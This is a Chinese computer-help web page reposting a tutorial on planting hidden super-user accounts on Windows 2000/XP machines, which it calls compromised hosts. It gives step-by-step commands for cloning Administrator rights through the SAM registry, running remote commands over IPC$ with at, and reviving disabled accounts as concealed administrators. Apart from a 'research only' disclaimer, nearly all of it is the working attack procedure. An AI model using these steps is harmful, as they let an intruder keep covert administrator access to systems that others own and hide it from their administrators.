网站首页  维修网点  QQ专家在线  电脑保修  工具软件   在线查毒   电脑问题搜索  官方论坛  站点地图  友情链接
 XML   RSS 2.0 
联盟点:北京   上海   深圳   广州   南京   杭州   成都   西安   厦门   武汉   重庆   天津   更多城市
加入收藏夹   设为主页

  认识电脑  

  电脑优化  

  电脑保养  

  故障症状  

  学习维修  

  维修资料  

  病毒门诊  

   数据恢复  

  使用技巧  

  电脑常识  

  笔记本  

  安全技术  

  系统漏洞  
专题导读: 操作系统  Windows Vista系统故障  Windows Xp系统故障  Windows 2003系统故障  Windows 2000系统故障  Windows 98系统故障  软件使用  网络配置  网络攻击  病毒  木马  主板  CPU  内存  硬盘  键盘  显卡  声卡  鼠标  显示器  音箱  刻录机  光驱、光盘  电源、UPS  网络设备  扫描仪  打印机  其它硬件  服务器  游戏平台  手机/MP3  相机/摄像头  USB  无线应用教程  软件漏洞  硬件漏洞 
您的位置: 网站首页 >> 数据恢复 >>Win2000/XP中多种建立隐藏超级用户的方法

Win2000/XP中多种建立隐藏超级用户的方法

发布日期: 2007-1-27 12:34:28 查看数:


PcHiHi

  一、如何在图形界面建立隐藏的超级用户
  图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序,修改键值的权限时在右键中点“权限”来修改。对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:
  1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户
  net user hacker$ 1234 /add
  2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
  3、点“权限”以后会弹出窗口
  点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
  4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。
  打开键:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"
  5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。
  6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
  7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可
  8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
  9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

  二、如何在命令行下远程建立隐藏的超级用户
  在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
  对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
  1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)
  2、先与肉鸡建立连接,命令为: net use 13.50.97.238ipc$ "12345678" /user:"administrator
  3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at 13.50.97.238 12:51
  c:winntsystem32net.exe user hacker$ 1234 /add
  建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。
  4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值:at 13.50.97.238 12:55
  c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
  /e 是regedit.exe的参数,在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将"c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers"引起来。
  5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy 13.50.97.238admin$system32hacker.reg
  c:hacker.reg
  修改的方法图形界中已经介绍过了,这里就不作介绍了。
  6、再将编辑好的hacker.reg拷回肉鸡上 copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg
  7、查看肉鸡时间:net time 13.50.97.238 然后用at命令将用户hacker$删除:
  at 13.50.97.238 13:40 net user hacker$ /del
  8、验证hacker$是否删除:用
  net use 13.50.97.238 /del 断开与肉鸡的连接。
  net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。
  9、再与肉鸡建立连接:net use 13.50.97.238ipc$ "12345678" /user:"administrator"
  再取得肉鸡时间,用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:
  at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg
  regedit.exe的参数/s是指安静模式。
  10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
  11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。
  12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。

 三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?
  这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。
  但是这里有两个前提:1、先用net use 肉鸡ipipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。
  2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。
  四、利用被禁用的帐户建立隐藏的超级用户:我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:
  1.想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。
  2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。
  3.如果你现在一个cmdshell,如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:
  net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。
  4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user 肉鸡ipipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。
  5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at 肉鸡ip 时间 net user hacker /active:no
  6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的"C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。
  五、注意的几点事项:
  1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。
  2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。
  3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。
  4、本方法在2000/XP上测试通过,未在NT上测试。
  注:本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成严重后果者,由使用者负责,本人概不负责。
www.PcHIHI.com

上下页导航
上一页:Win 2000中DLL文件报错或丢失解决方案 下一页:Windows 2003共享资源拒绝访问修复实录
【打印】 字体 【大】 【中】 【小】 【关闭】
热点主题
数据恢复大全数据恢复大全
硬盘变成raw格式的问题的解决方法硬盘变成raw格式的问题的解决方法
关于电脑不能显示隐藏文件的解决办法关于电脑不能显示隐藏文件的解决办法
U盘(优盘)数据恢复U盘(优盘)数据恢复
用软件nicexpress实现双网卡负载平衡用软件nicexpress实现双网卡负载平衡
USB移动硬盘安装PC3000的方法详解USB移动硬盘安装PC3000的方法详解
硬盘0磁道坏道修复硬盘0磁道坏道修复
效率源硬盘坏磁道修复软件综合[图解]教程效率源硬盘坏磁道修复软件综合[图解]教程
重现被误删的Windows桌面图标重现被误删的Windows桌面图标
EasyRecoveryEasyRecovery Pro V6使用详解
如何取消快捷方式图标中的小箭头如何取消快捷方式图标中的小箭头
使用Ghost错选恢复分区后使用Ghost错选恢复分区后
找回被覆盖的找回被覆盖的 outlook express 邮件
对有坏道硬盘的数据恢复对有坏道硬盘的数据恢复
硬盘数据恢复五大招硬盘数据恢复五大招
硬盘数据修复大师──EasyRecovery硬盘数据修复大师──EasyRecovery
误GHOST情况数据恢复技巧误GHOST情况数据恢复技巧
一次Outlook一次Outlook Express邮件数据恢复
EasyRecoveryEasyRecovery 604硬盘数据恢复软件技巧
误格式化数据恢复误格式化数据恢复
最新主题
轻松给磁盘查错轻松给磁盘查错
提示“虚拟内存”不足的解决办法提示“虚拟内存”不足的解决办法
Windows中共享网络打印机的技巧Windows中共享网络打印机的技巧
在桌面上右键-新建中没有了WORD、EXCEL解决办法在桌面上右键-新建中没有了WORD、EXCEL解决办法
教你找回回收站中误删的文件教你找回回收站中误删的文件
走出虚拟内存禁用的误区走出虚拟内存禁用的误区
卡巴斯基杀毒软件十九种实用使用方法卡巴斯基杀毒软件十九种实用使用方法
数据丢失的恢复大法数据丢失的恢复大法
E51E51 WiFi浏览互联网失败原因总结
十招技巧解决无法浏览网页的难题十招技巧解决无法浏览网页的难题
局域网内主机间互访故障及应对措施局域网内主机间互访故障及应对措施
如何用WinPE备份你的Windows如何用WinPE备份你的Windows Vista系统
小心“安德夫木马变种FDA”小心“安德夫木马变种FDA”
液晶显示器使用过程中的经验谈液晶显示器使用过程中的经验谈
将DVD光盘的内容复制到硬盘上观看将DVD光盘的内容复制到硬盘上观看
让Windows让Windows XP不再出现内存读写错误
系统刚重装后系统刚重装后 避免病毒攻击的十招
如何用软件来修复零磁道损坏的硬盘如何用软件来修复零磁道损坏的硬盘
网络资源推荐
站务联系:XBell@163.com 在线QQ:573861490
备案序号:粤ICP备06093858号
版权所有 2006 电脑维修知识网 最佳分辨率 1024 X 768
Copyright © Http://www.PcHiHi.com/ All rights reserved.